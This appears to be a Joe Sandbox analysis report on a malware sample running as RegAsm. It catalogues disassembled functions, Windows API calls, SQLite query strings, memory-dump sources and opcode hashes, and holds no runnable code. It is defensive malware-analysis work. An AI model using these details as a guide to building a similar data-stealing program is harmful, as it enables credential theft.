                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D41AFB5B007107AF7105B16EC82BEB7FB4DB81329F280629E151C59C2F3A9E59983E1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4B1D50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • no such database: %s, xrefs: 1B4B1E05
                                                                                                                                                                                                • CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN), xrefs: 1B4B1E2C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN)$no such database: %s
                                                                                                                                                                                                • API String ID: 0-1404816483
                                                                                                                                                                                                • Opcode ID: 4ebf46260c2e26a4da33c61f9a5c6f28f233c3de73127db9c81f379fb9d3a82e
                                                                                                                                                                                                • Instruction ID: 194f57925e108113109a69066bc0ed5557c6d832c7346e2855d4c1e64fcd0634
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ebf46260c2e26a4da33c61f9a5c6f28f233c3de73127db9c81f379fb9d3a82e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A3124766003096BD7105F6ADC41BDBBBDCEF85215F014569FE5897340EA7AB80187F0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040E377 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • strlen.MSVCRT ref: 0040E38B
                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 0040E3AC
                                                                                                                                                                                                  • Part of subcall function 0040E1C5: strlen.MSVCRT ref: 0040E1D1
                                                                                                                                                                                                  • Part of subcall function 0040E1C5: strlen.MSVCRT ref: 0040E1E7
                                                                                                                                                                                                  • Part of subcall function 0040E1C5: strlen.MSVCRT ref: 0040E280
                                                                                                                                                                                                • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,00000000,?,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000,000000FF), ref: 0040E3D9
                                                                                                                                                                                                • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 0040E4A3
                                                                                                                                                                                                • ??_V@YAXPAX@Z.MSVCRT ref: 0040E4B4
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: strlen$QueryVirtual
                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                • API String ID: 3099930812-2766056989
                                                                                                                                                                                                • Opcode ID: bc935735bfe66f2cfa709eb9292368b676d4d92ac508cf87d482b77474d67838
                                                                                                                                                                                                • Instruction ID: c8b3067a2108592b80ef189392ea64f237946407b23b110ec30888ac03a258c7
                                                                                                                                                                                                • Opcode Fuzzy Hash: bc935735bfe66f2cfa709eb9292368b676d4d92ac508cf87d482b77474d67838
                                                                                                                                                                                                • Instruction Fuzzy Hash: 92417F71A00109EFDF14DF96CC45AEF7BBAEF44358F14442AF905B2290D7389E609B98
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 004104D9 Relevance: 10.6, APIs: 7, Instructions: 119stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 004104DE
                                                                                                                                                                                                • strtok_s.MSVCRT ref: 00410509
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,0042549C,00000000,?,?,?,00000000), ref: 0041054C
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,00425498,00000000,?,?,?,00000000), ref: 0041057A
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,00425494,00000000,?,?,?,00000000), ref: 0041059F
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,00425490,00000000,?,?,?,00000000), ref: 004105D0
                                                                                                                                                                                                • strtok_s.MSVCRT ref: 00410606
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: strtok_s$H_prolog
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1158113254-0
                                                                                                                                                                                                • Opcode ID: 7a7ea6faa1a0c3b333f2e120b484d67a2e51921f489177db5e1a79cf971b9e4b
                                                                                                                                                                                                • Instruction ID: ebd3afb1fba8b709159ab264ef984f9babedf62ef1284e5e49618526588e8651
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a7ea6faa1a0c3b333f2e120b484d67a2e51921f489177db5e1a79cf971b9e4b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 09419071A0020AABC714DF65C981BEABBF9BB14315F10052FE405E6691DBBCDAC1CF59
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5431F0 Relevance: 9.5, APIs: 6, Instructions: 466COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: d607e783a53234a57d590ae923e76f3ff2efdc97e87b2651459457d3993fe6b3
                                                                                                                                                                                                • Instruction ID: c0ddbf6ef7788f835af0706701b89e76483d388f8f430444617e0990a9d4d286
                                                                                                                                                                                                • Opcode Fuzzy Hash: d607e783a53234a57d590ae923e76f3ff2efdc97e87b2651459457d3993fe6b3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4BF1E371A083419BE705CF18D8C47DABBE0BF84224F244A7DE8D997262F735E946CB91
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4C4E00 Relevance: 9.2, APIs: 6, Instructions: 231COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: da32897e83b0aff963613a5b243dd6116b22c1672a0ba425401abdd6acec35e3
                                                                                                                                                                                                • Instruction ID: c825e680833396d1b33c723bd5892eb2d4153219d2dd2cded6d6a1f826a275b8
                                                                                                                                                                                                • Opcode Fuzzy Hash: da32897e83b0aff963613a5b243dd6116b22c1672a0ba425401abdd6acec35e3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1581AC759042119BD7009F29D989B9B7BE8FF90B29F40482CFD88D7300D736E948CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00414D11 Relevance: 9.1, APIs: 6, Instructions: 128registrystringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00414D16
                                                                                                                                                                                                • memset.MSVCRT ref: 00414D42
                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,00020119,?,?,?,00000000), ref: 00414D5F
                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF,?,?,00000000), ref: 00414D7F
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00414DAE
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 00414DC1
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcat$H_prologOpenQueryValuememset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2333602472-0
                                                                                                                                                                                                • Opcode ID: e89c6f7f6df6db119f28572c97048b95ba73f9e7729f35408fa1683792117981
                                                                                                                                                                                                • Instruction ID: 6b6383bd5b7caf69e41b2564a079a2aef47e93a4663bb97bd4959b4e6f5e0dc6
                                                                                                                                                                                                • Opcode Fuzzy Hash: e89c6f7f6df6db119f28572c97048b95ba73f9e7729f35408fa1683792117981
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D415EB1C4022DABCF10EFA1DC46EDD7B7DEB04314F00456AF514A2191E735AB958BD6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5C73E0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 369COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master
                                                                                                                                                                                                • API String ID: 0-231581592
                                                                                                                                                                                                • Opcode ID: 0f983279b926cda9efcdff7433bfe7098ebf7d145b89aaa510319f0a54b92e80
                                                                                                                                                                                                • Instruction ID: 5082ae1df8426d0a4ec9faf77e3b27bb32a6c1f654ea0476b4b5bc9a1786462d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f983279b926cda9efcdff7433bfe7098ebf7d145b89aaa510319f0a54b92e80
                                                                                                                                                                                                • Instruction Fuzzy Hash: DCE105B0A043419FF701CF68C880BDBBBEABF95704F04492CE99897651E771E985CB92
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4B6DA0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 364COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • recursively defined fts5 content table, xrefs: 1B4B6DE2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: recursively defined fts5 content table
                                                                                                                                                                                                • API String ID: 0-437020801
                                                                                                                                                                                                • Opcode ID: d3bb32e9c12362acecfa0d8666f7d749dfbd655863d72f0f58ed7fe1bd565f23
                                                                                                                                                                                                • Instruction ID: 1d616ac343a92dc5c907979b46ff14cba206d4af478e3350a5ba95e8efd64569
                                                                                                                                                                                                • Opcode Fuzzy Hash: d3bb32e9c12362acecfa0d8666f7d749dfbd655863d72f0f58ed7fe1bd565f23
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4DD1E071904341CFDB04CF19C580796BBE0FF89324F498A5EE9898B341D779E886CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00419C27 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __lock.LIBCMT ref: 00419C35
                                                                                                                                                                                                  • Part of subcall function 00418613: __mtinitlocknum.LIBCMT ref: 00418629
                                                                                                                                                                                                  • Part of subcall function 00418613: __amsg_exit.LIBCMT ref: 00418635
                                                                                                                                                                                                  • Part of subcall function 00418613: EnterCriticalSection.KERNEL32(00000000,00000000,?,00419281,0000000D,?,?,004196D5,00418172,?,?,0041727B,00000000,0042C868,004172C2,?), ref: 0041863D
                                                                                                                                                                                                • DecodePointer.KERNEL32(0042C7F0,00000020,00419D78,00000000,00000001,00000000,?,00419D9A,000000FF,?,0041863A,00000011,00000000,?,00419281,0000000D), ref: 00419C71
                                                                                                                                                                                                • DecodePointer.KERNEL32(?,00419D9A,000000FF,?,0041863A,00000011,00000000,?,00419281,0000000D,?,?,004196D5,00418172), ref: 00419C82
                                                                                                                                                                                                  • Part of subcall function 004191FA: EncodePointer.KERNEL32(00000000,0041CDCC,00640400,00000314,00000000,?,?,?,?,?,00419F8F,00640400,Microsoft Visual C++ Runtime Library,00012010), ref: 004191FC
                                                                                                                                                                                                • DecodePointer.KERNEL32(-00000004,?,00419D9A,000000FF,?,0041863A,00000011,00000000,?,00419281,0000000D,?,?,004196D5,00418172), ref: 00419CA8
                                                                                                                                                                                                • DecodePointer.KERNEL32(?,00419D9A,000000FF,?,0041863A,00000011,00000000,?,00419281,0000000D,?,?,004196D5,00418172), ref: 00419CBB
                                                                                                                                                                                                • DecodePointer.KERNEL32(?,00419D9A,000000FF,?,0041863A,00000011,00000000,?,00419281,0000000D,?,?,004196D5,00418172), ref: 00419CC5
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2005412495-0
                                                                                                                                                                                                • Opcode ID: 4b294464a69c7ed5a0e400bc0e7b709ae240815f70b99885f44d4682db768394
                                                                                                                                                                                                • Instruction ID: 8bd5f59fe7337ac10d8a9351378d8553da16a8709647653562f13b28bf213590
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b294464a69c7ed5a0e400bc0e7b709ae240815f70b99885f44d4682db768394
                                                                                                                                                                                                • Instruction Fuzzy Hash: E0313B30A0031ADFEF119FA6E9946EDBBF1BB49314F14402BE551A6250EBBC4C81CF59
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B536180 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 335COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • NEAR, xrefs: 1B53642A
                                                                                                                                                                                                • fts5 expression tree is too large (maximum depth %d), xrefs: 1B536349
                                                                                                                                                                                                • expected integer, got "%.*s", xrefs: 1B53648D
                                                                                                                                                                                                • fts5: syntax error near "%.*s", xrefs: 1B536436
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
